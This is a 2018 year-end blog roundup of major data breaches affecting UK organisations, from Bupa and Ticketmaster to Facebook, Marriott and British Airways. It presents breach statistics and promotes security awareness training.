2018 Roundup – The Cybersecurity Mega-Hacks of the Year

It’s that time of year again where we look back to look forward.

Being security aware means that we know what to expect and how to deal with it. As part of this, we need to keep a keen eye on what cyber-attacks have happened recently. Now we are coming to the close of 2018, let’s look back at some of the biggest cybersecurity attacks of the year and what we can learn from them.

But before we start to look at some of the 2018 mega-hacks, check out some of the numbers from the last 12-18 months collected by analysts and industry experts.

From the UK Government 2018 UK Cybersecurity Breaches Survey:

• 43% of companies, of all sizes, experienced a cyber breach

• 42% of micro companies experienced a cyber breach

• 75% of employees reported receiving spoof emails

• But, we are learning – 92% of companies applied software patches when they became available, otherwise, the breach figures may have been even higher

Across the world, some sobering statistics:

• In the first half of 2018, there were 18.5 million records lost every single day

• Less than 3% of data breaches were secured (i.e. they were not encrypted)

• In August alone, there were 215 million data records exposed.

The costs are staggering:

• Ponemon and IBM found that the average cost of a data breach in the year to July 2018 was up by 6.4% from the previous year to $3.86 million (approximately, £2.9 million)

• A UK specific study by PWC 2018 Global Economic Crime Survey found that UK firms lost, on average, £700,000 due to fraud.

The Mega-Hack Olympics of 2018

Now, onto the hacks of the year -these aren’t necessarily the “biggest” or “worst” but ones we’ve considered to have a significant impact and also showing a real range in attack vectors.   In fact, there has been a rich list of companies who have been hacked in 2018 and it is hard to pick a “winner”. We have decided to keep it to hacks that have hit UK companies or, at least, affected UK citizens. Many of these hacks have human error or mishaps as a central theme.

Runnersup:

UK Schools

When: Throughout 2018

Who: Schools across the UK

How many affected: Multiple

A number of schools across the UK, including in the private sector, were targeted with a phishing campaign in 2018. Targeting is spread out across multiple schools, relying on the lack of IT resourcing and poor security to get at sensitive data. The mechanism into the network each time was a phishing email used to steal login credentials to the network. Once in the network, personal data, including email addresses, were harvested. The cybercriminals subsequently targeted parents of children at private schools in a modified Business Email Compromise type scam. The compromised school network being used to locate the email address of parents paying for school places. This email received, contained an invoice for fee payment – the payment then being sent to the hackers account.

BUPA

When: Throughout 2017 with action taken in 2018

Who: Bupa Insurance Services Limited

How many affected: 547,000

This was a case of insider threat. An employee at BUPA, extracted the personal data of over half a million customers and sent it to his personal email address. The data included names, address, nationality, etc. The BUPA employee then put the data up for sale on the dark web. BUPA was fined £175,000 by the UK’s Information Commissioners Office (ICO) in late 2018, for not putting the right security measures in place to spot unusual behaviour.

Ticketmaster

When: February to June 2018

Who: Ticketmaster

How many affected: 40,000 UK customers

Anyone who bought tickets from Ticketmaster between February to June 2018 may have had their personal data breached. The breach was caused when a third-party vendor of Ticketmaster, Inbenta Technologies, a chat tool supplier, was hacked. Unbeknownst to Inbenta, their software had been exploited and was exporting data to a hacker who had taken control of the chat tool; a case of “cyber-whispers”.

Bronze Medal: Facebook

When: September 2018

Who: Facebook

How many affected: 30 million

First, there was the Facebook/Cambridge Analytica debacle when Facebook sold data, without user consent, to data mining company, Cambridge Analytica. Then, came the data breach where around 30 million Facebook users had their accounts compromised. The data leaked was personal, and potentially has secondary attack implications. Many online services use a system known as Knowledge Based Authentication (KBA) which asks personal questions such as “What is your mother’s maiden name” to recover passwords, etc. The data collected by hackers from exposed Facebook accounts could potentially provide all of the KBA needed to hack into commercial sites.

Facebook may now face a fine of up to 4% of their gross global revenue if the attack is found to be non-compliant with GDPR rules.

What caused it? Investigations are continuing, but the attack seems to be highly targeted and focuses on a flaw in the “View As” functionality of the platform.

Facebook has posted a notice to allow users to find out if they were one of the affected 30 million.

Silver Medal: Marriott/Starwood

When: November 2018 announcement, but was an ongoing breach

Who: Marriott Hotel and Starwood

How many affected: 500 million

The hack of Starwood, a subdivision of Marriott Hotels, ended with the exposure of the personal data of around 500 million guests. The data leak included name, address, and passport number. Some of the leaked data also contained financial details such as credit card numbers – the latter, however, was encrypted. Marriott’s stock was down 5% after the breach report went public.

What caused it? The jury is still out on the exact cause of the breach. However, there are concerns surfacing about the merger of Starwood with Marriott and how this may have impacted security strategy and the overlap of security measures. The latest view is that a Chinese hacking gang was behind the targeted attack.

Read more in our blog post about the hack here.

Gold Medal:  British Airways

When: August-September 2018

Who: British Airways

How many affected: 380,000

In the Mega-Hack Olympics, there can only be one “winner” and this year it has to be that national treasure, British Airways. BA is now facing a fine of around £897 million for the breach of data of around 380,000 passengers. As well as personal data, the exposed information includes full credit card details along with the CVV number of the card. Most customers were urged by their bank to close down card accounts to manage the breach.

What caused it? Again, BA was targeted, this time by a hacking gang known as Magecart. RiskIQ looked at the anatomy of the breach and found that it was likely due to the hackers changing the code on the BA website and in the BA mobile app. The changed code then made sure that any data that was submitted to the BA site/app was also sent to a site that was under the control of the hackers. Simple, but very effective, and very damaging to BA’s customers.

Can We Expect a Breach Free New Year?

Although it is usually only the biggest hacks that make the news headlines, it is all companies, across all sectors that are at risk of a cybersecurity attack. What we must do is learn from the mistakes made by others. Each breach that happens gives us an insight into how a cybercriminal operates and the weaknesses that they leverage. We can look to the issues of 2018 and see that many were due to human-factors such as phishing and insider threats. Others due to poor secure coding techniques, or simple lack of attention to detail when applying security measures.

Being cyber-security aware gives us the ammunition to take on cybercrime. With the right security awareness training in place, we can make sure that employees spot a phishing email or unusual employee behaviour before the worst happens. With knowledge comes strength to protect our businesses and make 2019 a year where cybercrime takes the hit, not our data.